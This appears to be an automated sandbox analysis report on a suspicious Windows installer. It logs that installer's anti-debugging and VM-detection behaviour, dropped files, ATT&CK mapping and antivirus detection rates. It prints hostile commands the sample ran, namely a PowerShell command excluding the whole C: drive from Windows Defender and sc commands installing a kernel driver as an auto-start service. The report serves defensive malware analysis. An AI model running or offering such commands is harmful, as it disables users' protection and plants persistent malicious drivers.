Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6527Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3274Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpWindow / User API: threadDelayed 540Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpWindow / User API: threadDelayed 604Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpWindow / User API: threadDelayed 521Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0EE090 FindFirstFileA,FindClose,FindClose,6_2_6C0EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00CA6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00CA7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA9C60 GetSystemInfo,10_2_00CA9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000002.1772033618.0000000001408000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000002.1772033618.0000000001408000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BF73886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6BF73886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C103871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C103871
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00D257D0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C10D425 mov eax, dword ptr fs:[00000030h]6_2_6C10D425
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C10D456 mov eax, dword ptr fs:[00000030h]6_2_6C10D456
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C10286D mov eax, dword ptr fs:[00000030h]6_2_6C10286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C103871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C103871
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0FC3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C0FC3AD

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1CA700 cpuid 6_2_6C1CA700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CAAB2A GetSystemTimeAsFileTime,10_2_00CAAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D40090 GetVersion,10_2_00D40090

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory421
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580542 Sample: #U5b89#U88c5#U7a0b#U5e8f_1.... Startdate: 25/12/2024 Architecture: WINDOWS Score: 96 90 Multi AV Scanner detection for dropped file 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 3 other signatures 2->96 10 #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vbc, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 26 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp 4 15 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vbc, PE32 55->78 dropped 80 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->82 dropped 84 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 7 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe5%ReversingLabsWin32.Trojan.Generic
#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe8%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc26%ReversingLabs
